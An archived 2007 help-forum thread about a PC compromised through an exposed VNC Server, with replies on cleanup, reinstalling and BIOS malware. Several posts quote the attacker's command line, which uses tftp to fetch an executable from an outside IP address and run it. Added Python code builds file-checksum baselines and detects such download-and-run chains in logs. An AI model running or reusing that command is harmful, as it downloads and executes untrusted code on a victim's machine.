Trojan from using VNC Viewer Software - Firewalls



Thread: Trojan from using VNC Viewer Software

  1. Trojan from using VNC Viewer Software

    Hey guys. I've been using the VNC Viewer software to access a Linux
    environment at my University's Linux servers.

    However, I have over the last few days had a number of occurrences of a
    Trojan somehow finding its way onto my computer. At some point I would
    suddenly lose control of the computer. A Task Manager window would
    come up, followed by a run window. In this run window the following
    two things are entered:

    %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    64.79.213.12 GET ktqjy.exe & start ktqjy&

    %systemroot%\system32\cmd.exe

    In the past I have always been at my computer, so I have been able to
    interrupt it by just turning the computer off before it can do what it
    is trying to do. Following the last occurrence I spent all afternoon
    running virus scans and spyware scans using:

    AVG Anti virus
    AVG anti spyware
    Zonealarm Pro's spyware scanner
    Spybot Search and Destroy

    A Trojan was found (called Generic3.ARX) by AVG and a number of
    Spyware items were found and deleted. Satisfied that all was well, I
    opened up the VNC Viewer software and got back to work.

    However, today whilst I went away to get a drink the Trojan ran again.
    This time I was unable to interrupt it and I came back to find a Task
    manager window, a run window and a command prompt all open. Clearly
    whatever the Trojan tries to do it has succeeded. I am running both
    AVG anti virus and anti spyware scans at the moment but nothing
    appears to be coming up this time.

    Therefore, what can I do to eradicate whatever this Trojan has done to
    my computer? What sort of things would this Trojan do? (or begin doing
    as we speak?). Simply not using VNC Viewer is not an option as I need
    it to do my coursework.

    I run the latest version of ZoneAlarm Pro along with the other
    programmes mentioned above to combat spyware.

    Kind regards,

    Matt


  2. Re: Trojan from using VNC Viewer Software

    Matt wrote on 30 Mar 2007 08:55:11 -0700:

    > Hey guys. I've been using the VNC Viewer software to access a Linux
    > environment at my University's Linux servers.
    >
    > However, I have over the last few days had a number of occurrences of a
    > Trojan somehow finding its way onto my computer. At some point I would
    > suddenly lose control of the computer. A Task Manager window would
    > come up, followed by a run window. In this run window the following
    > two things are entered:
    >
    > %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    > 64.79.213.12 GET ktqjy.exe & start ktqjy&
    >
    > %systemroot%\system32\cmd.exe
    >
    > In the past I have always been at my computer, so I have been able to
    > interrupt it by just turning the computer off before it can do what it
    > is trying to do. Following the last occurrence I spent all afternoon
    > running virus scans and spyware scans using:
    >
    > AVG Anti virus
    > AVG anti spyware
    > Zonealarm Pro's spyware scanner
    > Spybot Search and Destroy
    >
    > A Trojan was found (called Generic3.ARX) by AVG and a number of
    > Spyware items were found and deleted. Satisfied that all was well, I
    > opened up the VNC Viewer software and got back to work.
    >
    > However, today whilst I went away to get a drink the Trojan ran again.
    > This time I was unable to interrupt it and I came back to find a Task
    > manager window, a run window and a command prompt all open. Clearly
    > whatever the Trojan tries to do it has succeeded. I am running both
    > AVG anti virus and anti spyware scans at the moment but nothing
    > appears to be coming up this time.
    >
    > Therefore, what can I do to eradicate whatever this Trojan has done to
    > my computer? What sort of things would this Trojan do? (or begin doing
    > as we speak?). Simply not using VNC Viewer is not an option as I need
    > it to do my coursework.
    >
    > I run the latest version of ZoneAlarm Pro along with the other
    > programmes mentioned above to combat spyware.
    >
    > Kind regards,
    >
    > Matt



    This should have nothing to do with the Viewer, are you sure you didn't also
    install the Server on your own machine and leave the port open to the
    outside world? See http://www.realvnc.com/pipermail/vnc...ry/057050.html
    for more info, basically someone/something is connecting to the VNC Server
    on your machine bypassing the authentication, and then running the commands
    (either manually or using a script, most likely using a script). I'm
    guessing that when you downloaded and installed VNC Viewer you actually
    downloaded the full Client+Server package and installed both, and you allowed
    VNC Server to listen in Zone Alarm, probably when it first ran and you
    blindly hit the Allow button. Get your machine cleaned and uninstall VNC
    Server - you do not need the server component to use the Viewer to access
    another machine.

    Dan



  3. Re: Trojan from using VNC Viewer Software

    On Fri, 30 Mar 2007 08:55:11 -0700, Matt wrote:

    > Hey guys. I've been using the VNC Viewer software to access a Linux
    > environment at my University's Linux servers.
    >
    > However, I have over the last few days had a number of occurrences of a
    > Trojan somehow finding its way onto my computer. At some point I would
    > suddenly lose control of the computer. A Task Manager window would
    > come up, followed by a run window. In this run window the following
    > two things are entered:
    >
    > %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
    > 64.79.213.12 GET ktqjy.exe & start ktqjy&
    >
    > %systemroot%\system32\cmd.exe
    >
    > In the past I have always been at my computer, so I have been able to
    > interrupt it by just turning the computer off before it can do what it
    > is trying to do. Following the last occurrence I spent all afternoon
    > running virus scans and spyware scans using:
    >
    > AVG Anti virus
    > AVG anti spyware
    > Zonealarm Pro's spyware scanner
    > Spybot Search and Destroy
    >
    > A Trojan was found (called Generic3.ARX) by AVG and a number of
    > Spyware items were found and deleted. Satisfied that all was well, I
    > opened up the VNC Viewer software and got back to work.
    >
    > However, today whilst I went away to get a drink the Trojan ran again.
    > This time I was unable to interrupt it and I came back to find a Task
    > manager window, a run window and a command prompt all open. Clearly
    > whatever the Trojan tries to do it has succeeded. I am running both
    > AVG anti virus and anti spyware scans at the moment but nothing
    > appears to be coming up this time.
    >
    > Therefore, what can I do to eradicate whatever this Trojan has done to
    > my computer? What sort of things would this Trojan do? (or begin doing
    > as we speak?). Simply not using VNC Viewer is not an option as I need
    > it to do my coursework.
    >
    > I run the latest version of ZoneAlarm Pro along with the other
    > programmes mentioned above to combat spyware.


    First, how do you know it's a trojan STILL on your system?

    Did you reset the VNC connection password?

    Did you change the default VNC Server port to something other than 5900?

    Why is your computer exposed directly to the internet instead of behind a
    NAT appliance of some type?



    --
    Want to know what PCBUTTS1 is really about?
    *** WARNING - this links contains foul/pornographic content of an
    abusive nature created by PCBUTTS1 and still hosted on his public
    website ***
    http://www.pcbutts1.com/downloads/leythos.htm

  4. Re: Trojan from using VNC Viewer Software

    > First, how do you know it's a trojan STILL on your system?

    That's an assumption I am making, I doubt the Trojan would kindly
    remove all traces of itself once it has done what it wanted to do.
    I've run scans in all the programmes I mentioned above and none of them
    could find any mention of this Trojan, so it has clearly tidied up
    after itself very well.

    > Did you reset the VNC connection password?


    I'm using VNC Viewer 4.1.2 (the free one) which has no such option.

    > Did you change the default VNC Server port to something other than 5900?


    Again, I had no such option.

    > Why is your computer exposed directly to the internet instead of behind a
    > NAT appliance of some type?


    I use a router (which HAD the ports open for VNC I thought I needed,
    but I have just closed them realising of course that they aren't
    actually needed), along with Zonealarm, so I don't see myself as being
    directly connected to the Internet.

    Kind regards,

    Matt



  5. Re: Trojan from using VNC Viewer Software

    > This should have nothing to do with the Viewer, are you sure you didn't also
    > install the Server on your own machine and leave the port open to the
    > outside world? See http://www.realvnc.com/pipermail/vnc-list/2007-February/057050.html
    > for more info, basically someone/something is connecting to the VNC Server
    > on your machine bypassing the authentication, and then running the commands
    > (either manually or using a script, most likely using a script). I'm
    > guessing that when you downloaded and installed VNC Viewer you actually
    > downloaded the full Client+Server package and installed both, and you allowed
    > VNC Server to listen in Zone Alarm, probably when it first ran and you
    > blindly hit the Allow button. Get your machine cleaned and uninstall VNC
    > Server - you do not need the server component to use the Viewer to access
    > another machine.


    You are absolutely right, I did install the full package and probably
    did tell ZoneAlarm to let it have special privileges. I will
    uninstall it right away. The only problem is that I don't think I am
    going to be able to "clean" my computer, because after running all the
    scans I mentioned above, none of them came up with anything.

    Is there anything I can do aside from reformatting my computer to
    ensure I get rid of this?

    Kind Regards,

    Matt



  7. Re: Trojan from using VNC Viewer Software

    On 30 Mar 2007 10:03:04 -0700, "Matt" wrote:

    >Is there anything I can do aside from reformatting my computer to
    >ensure I get rid of this?


    Use Autoruns to look for startup programs that you didn't authorize. Look
    for any instances of DLL files being loaded on startup that are not
    authorized. You can try looking in the System32 directory for recently
    modified files, or hidden files that have random names like xzlk.dll, and
    send the files found to http://www.virustotal.com/en/indexf.html for
    analysis. You could also try running a spyware scanner like Spybot Search
    & Destroy or SuperAntiSpyware; the latter can detect files based on
    characteristics like size, random file names, and other attributes that are
    common among trojans and malware.

  8. Re: Trojan from using VNC Viewer Software

    > Is there anything I can do aside from reformatting my computer to
    > ensure I get rid of this?
    >




  9. Re: Trojan from using VNC Viewer Software

    On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    > > Is there anything I can do aside from reformatting my computer to
    > > ensure I get rid of this?

    >
    >


    That makes for some interesting reading, looks like a reformat is the
    only option.

    Thanks to everyone for all the replies.

    Kind Regards,

    Matt


  10. Re: Trojan from using VNC Viewer Software

    Matt wrote:
    > On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>> Is there anything I can do aside from reformatting my computer to
    >>> ensure I get rid of this?

    >>

    >
    > That makes for some interesting reading, looks like a reformat is the
    > only option.


    There are exploits that modify the POST code and BIOS so that even
    reformatting may not help :-( Is it time for a new computer???

  11. Re: Trojan from using VNC Viewer Software

    Rick Merrill wrote:
    > Matt wrote:
    >> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>>> Is there anything I can do aside from reformatting my computer to
    >>>> ensure I get rid of this?
    >>>

    >>
    >> That makes for some interesting reading, looks like a reformat is the
    >> only option.

    >
    > There are exploits that modify the POST code and BIOS so that even
    > reformatting may not help :-( Is it time for a new computer???


    ??? i've never heard of anything specifically modifying the power on
    self test (post) facility of a computer (isn't it *part of* the bios?)...

    as for the bios, the only modifications any known malware has ever made
    is to corrupt flashable bios, and that is rather noticeable as it stops
    the computer from booting...

    so no, it's not time for a new computer yet...

    --
    "it's not the right time to be sober
    now the idiots have taken over
    spreading like a social cancer,
    is there an answer?"

  12. Re: Trojan from using VNC Viewer Software

    Matt wrote:

    > On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>> Is there anything I can do aside from reformatting my computer to
    >>> ensure I get rid of this?

    >>
    >>

    >
    > That makes for some interesting reading, looks like a reformat is the
    > only option.


    Yes and no.

    Everything that restores your computer to a well-known safe state is an
    option. If you have a verified backup, you can restore from that. You can
    compare against a complete reference system. If you have a backup
    containing a list of checksums of all system-relevant files, you can detect
    the changes and selective restore these parts (or verify them as harmless
    changes). You can boot a trusted system and verify all signed binaries and
    just restore all relevant data files (Windows Registry and some other
    databases, some INF and INI files, boot sector etc.).

    But, if no such safe reference exists, the only well-known safe state is a
    fresh install. Sadly, this is the most common case.
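As an added example, not from any poster in this thread, the following Python builds the kind of checksum list described above and later reports which files were added, removed or changed, so only those need restoring or inspection. Directory and file names are constructed in a temporary directory; on a real machine the baseline must be stored off the suspect box and the check run after booting trusted media, as the post says, since a live rootkit can hide changes from tools running on the infected system.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries need not be read at once."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    baseline: Dict[str, str] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = sha256_of(p)
    return baseline


def verify(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the tree against the baseline; only these entries need action."""
    current = build_baseline(root)
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),    # dropped files
        "removed": sorted(baseline.keys() - current.keys()),  # deleted files
        "changed": sorted(k for k in common if baseline[k] != current[k]),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a toy system32, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "system32"
        (root / "drivers" / "etc").mkdir(parents=True)
        (root / "user32.dll").write_bytes(b"pretend user32 code")
        (root / "kernel32.dll").write_bytes(b"pretend kernel32 code")
        (root / "drivers" / "etc" / "hosts").write_bytes(b"127.0.0.1 localhost\n")
        baseline = build_baseline(root)  # taken while the box is known good
        # Simulated infection: patched DLL, dropped binary, deleted file.
        (root / "user32.dll").write_bytes(b"pretend user32 code, patched")
        (root / "ktqjy.exe").write_bytes(b"MZ not really a program")
        (root / "drivers" / "etc" / "hosts").unlink()
        return verify(root, baseline)
```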

  13. Re: Trojan from using VNC Viewer Software

    kurt wismer wrote:

    > Rick Merrill wrote:
    >> Matt wrote:
    >>> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    >>>>> Is there anything I can do aside from reformatting my computer to
    >>>>> ensure I get rid of this?
    >>>>
    >>>
    >>> That makes for some interesting reading, looks like a reformat is the
    >>> only option.

    >>
    >> There are exploits that modify the POST code and BIOS so that even
    >> reformatting may not help :-( Is it time for a new computer???

    >
    > ??? i've never heard of anything specifically modifying the power on
    > self test (post) facility of a computer (isn't it *part of* the bios?)...
    >
    > as for the bios, the only modifications any known malware has ever made
    > is to corrupt flashable bios, and that is rather noticeable as it stops
    > the computer from booting...
    >
    > so no, it's not time for a new computer yet...


    Actually it's quite trivial to modify the BIOS (intentionally!), see what
    the BIOS modder communities are achieving. It would be no problem to
    implement such malware.

    There have been extensive discussions about the default settings for
    enabling flashing the BIOS as well as how well these actually work. If you
    have a hardware-implemented switch, if it's set to disabled, and your flash
    chip is not one of those old Intel or Atmel chips from before about 2001,
    it shouldn't be possible to flash the BIOS.

  14. Re: Trojan from using VNC Viewer Software

    > ??? i've never heard of anything specifically modifying the power on
    > self test (post) facility of a computer (isn't it *part of* the bios?)...
    >
    > as for the bios, the only modifications any known malware has ever made
    > is to corrupt flashable bios, and that is rather noticeable as it stops
    > the computer from booting...
    >
    > so no, it's not time for a new computer yet...


    Well I formatted and reinstalled Windows a few days ago now and
    everything seems to be running smoothly.

    Thanks again for all the replies on this topic.

    Kind regards,

    Matt


  15. Re: Trojan from using VNC Viewer Software

    On Mar 30, 6:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
    > > Is there anything I can do aside from reformatting my computer to
    > > ensure I get rid of this?

    >
    >


    Well assuming your original post contains the only commands that were
    run here's what we can figure out.

    "%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET ktqjy.exe & start ktqjy& "

    %comspec% is an environment variable on Windows systems which points to
    the command prompt executable. We can verify this by launching a
    command prompt and echoing the value to the screen, i.e.:
    C:\Documents and Settings\someuser>echo %comspec%
    C:\WINNT\system32\cmd.exe

    Next we can see what the /c switch does for the command prompt
    (cmd.exe), ie:
    C:\Documents and Settings\someuser>cmd.exe /?
    Starts a new instance of the Windows XP command interpreter

    CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
        [[/S] [/C | /K] string]

    /C Carries out the command specified by string and then
    terminates

    Ok so /c carries out the commands provided when cmd.exe is called (via
    %comspec%).

    Next we see that he echoed some useless junk to the
    screen....Repairing....Please Wait, laaa deee daaaa.

    Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can
    verify this by checking the command options for tftp:

    C:\Documents and Settings\someuser>tftp /?

    Transfers files to and from a remote computer running the TFTP
    service.

    TFTP [-i] host [GET | PUT] source [destination]

    -i Specifies binary image transfer mode (also called
    octet). In binary image mode the file is moved
    literally, byte by byte. Use this mode when
    transferring binary files.

    So -i specifies binary transfer, which is what he'd need for an
    executable (exe).

    Lastly he launches ktqjy.

    ktqjy.exe should be sitting in whatever the default directory of your
    command prompt is, something like "C:\Documents and Settings\someuser"
    if you go to the start menu, select Run, type cmd and hit OK, it'll be
    displayed on the screen. You can navigate to this directory in
    explorer and delete the file. You may have to launch task manager and
    "End Process" on it first. Also you should fire up msconfig (start:run
    msconfig) and review all your startup items.

    etc....

    Just follow the information you have.
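As an added example, not from any poster in this thread, the Python below applies the reading given above to command lines as process-creation auditing on a Windows host would record them: it strips the %comspec% /c wrapper, splits the chain on cmd.exe's separators, and reports any tftp GET whose fetched file is then launched with start. The sample lines are constructed; the first is the chain quoted in this thread.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# "%comspec% /c ..." or "cmd.exe /k ..." just hands the rest of the line to a
# fresh interpreter; strip that wrapper before looking at the chain itself.
_WRAPPER = re.compile(r'^\s*"?(?:%comspec%|cmd(?:\.exe)?)"?\s+/[ck]\s+', re.I)
# Separators cmd.exe recognises between commands (& && | ||). A redirection
# such as 2>&1 would also be split here; acceptable for a triage heuristic.
_SEPARATORS = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


@dataclass
class Finding:
    host: str          # TFTP server the file was pulled from
    filename: str      # local name it was saved under
    binary_mode: bool  # -i given (needed for an intact executable)
    executed: bool     # a later 'start' in the same chain launched it


def split_chain(cmdline: str) -> List[str]:
    """Strip the cmd /c wrapper and split the line into its sub-commands."""
    body = _WRAPPER.sub("", cmdline, count=1)
    return [seg for seg in _SEPARATORS.split(body) if seg.strip()]


def _stem(name: str) -> str:
    """Bare lower-case file name without path or .exe, for matching."""
    base = name.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def _parse_tftp(tokens: List[str]) -> Optional[Finding]:
    """Follow 'TFTP [-i] host [GET | PUT] source [destination]' from tftp /?."""
    words = [t.lower() for t in tokens]
    if "get" not in words:
        return None                      # PUT or malformed: not a download
    g = words.index("get")
    if g < 1 or g + 1 >= len(tokens):
        return None                      # no host or no source given
    dest = tokens[g + 2] if g + 2 < len(tokens) else tokens[g + 1]
    return Finding(host=tokens[g - 1], filename=dest,
                   binary_mode="-i" in words[:g], executed=False)


def analyze(cmdline: str) -> List[Finding]:
    """One Finding per tftp GET in the chain, flagged if later started."""
    findings: List[Finding] = []
    for segment in split_chain(cmdline):
        tokens = segment.split()
        verb = tokens[0].strip('"').lower()
        if verb in ("tftp", "tftp.exe"):
            f = _parse_tftp(tokens)
            if f is not None:
                findings.append(f)
        elif verb == "start":
            # 'start' accepts /switches and an optional "title" first; the
            # next bare token is the program (a quoted path is not handled).
            args = [t for t in tokens[1:] if not t.startswith(("/", '"'))]
            for f in findings:
                if args and _stem(f.filename) == _stem(args[0]):
                    f.executed = True
    return findings


# Constructed sample lines; the first is the chain quoted in this thread.
SAMPLE_LINES = [
    "%comspec% /c echo Repairing user32.dll & echo Please wait... & "
    "tftp -i 64.79.213.12 GET ktqjy.exe & start ktqjy&",
    "cmd.exe /c tftp 10.0.0.5 PUT config.bin",
    "echo hello & dir",
]
```

Run `analyze(line)` over each line of a command-line log; the thread's chain yields one finding with host 64.79.213.12, file ktqjy.exe and executed=True, while the PUT and the plain echo yield nothing.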


  16. Re: Trojan from using VNC Viewer Software

    kingthorin@gmail.com wrote:

    > Lastly he launches ktqjy.
    >
    > ktqjy.exe should be sitting in whatever the default directory of your
    > command prompt is, something like "C:\Documents and Settings\someuser"
    > if you go to the start menu, select Run, type cmd and hit OK, it'll be
    > displayed on the screen. You can navigate to this directory in
    > explorer and delete the file. You may have to launch task manager and
    > "End Process" on it first. Also you should fire up msconfig (start:run
    > msconfig) and review all your startup items.
    >
    > etc....
    >
    > Just follow the information you have.


    In the meantime, ktqjy.exe has modified various system binaries, imposed
    some kernel hooks such that killing it just removes it from the list of
    processes (but it keeps on running) and doesn't list the three other
    copies of itself any more, has downloaded 5 other binaries and executed
    some, modified some system settings to open some obtrusive security
    vulnerabilities to allow easier reinfection, ...

    Oh, and it might have simply modified the previous history.

    In short: you have no reliable information whatsoever.
